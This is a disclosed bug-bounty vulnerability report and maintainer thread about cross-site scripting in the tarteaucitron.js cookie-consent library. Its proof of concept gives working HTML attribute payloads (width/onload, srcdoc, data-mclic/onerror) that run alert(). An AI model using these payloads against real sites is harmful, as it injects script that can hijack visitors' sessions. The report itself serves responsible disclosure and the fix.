youtube service is vulnerable to XSS vulnerability in amauric/tarteaucitron.js


Reported on

Jul 2nd 2023


If an attacker is able to insert a div with attributes on a page where the youtube service is enabled, they can craft a width attribute that would allow them to execute arbitrary JS on the page.

(Other attributes like theme or controls are also vulnerable to this.)

Proof of Concept

<!DOCTYPE html>
<html lang="en">
    <title>TAC XSS</title>
    <script src="tarteaucitron.js"></script>
    (tarteaucitron.job = tarteaucitron.job || []).push('youtube');
    tarteaucitron.init({ readmoreLink: '/foo', orientation: 'bottom' });
    <div class="youtube_player" videoID="vo-SxWZ7tyM" width='" onload="alert(`xss`);"'></div>

The srcdoc attribute can also be used for this (and should probably not be allowed):

    <div class="youtube_player" videoID="vo-SxWZ7tyM" srcdoc='<script>alert(`xss`)</script>'></div>


Imagine a website where users can post comments containing limited HTML (but not <script> tags). This vulnerability would allow an attacker to bypass this restriction and inject JS in the page.

We are processing your report and will contact the amauric/tarteaucitron.js team within 24 hours. 3 months ago
Pierre Rudloff
3 months ago


Services that build <img> tags are also vulnerable. For example, the kwanko service:

    <div class="tac_kwanko" data-mclic='" onerror="alert(`xss`);"'></div>
We created a GitHub Issue asking the maintainers to create a 3 months ago
We have contacted a member of the amauric/tarteaucitron.js team and are waiting to hear back 3 months ago
2 months ago



Thanks for your report :)

The attr are already retrieved by a custom function If I filter the result with this function, it should be enought?


Pierre Rudloff
2 months ago


The best practice here would be to stop building HTML with concatenation and instead use DOM methods like createElement() and setAttribute(). However, this would require rewriting a lot of services code.

I guess calling fixSelfXSS() in getElemAttr() could be a quicker fix.

We have sent a follow up to the amauric/tarteaucitron.js team. We will try again in 7 days. 2 months ago
Amauri CHAMPEAUX validated this vulnerability 2 months ago

Thanks, I've applied this quick fix and note to review the code to create html with the DOM functions.

Pierre Rudloff has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Amauri CHAMPEAUX marked this as fixed in v1.13.1 with commit c4c2fc 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
Amauri CHAMPEAUX published this vulnerability 2 months ago
to join this conversation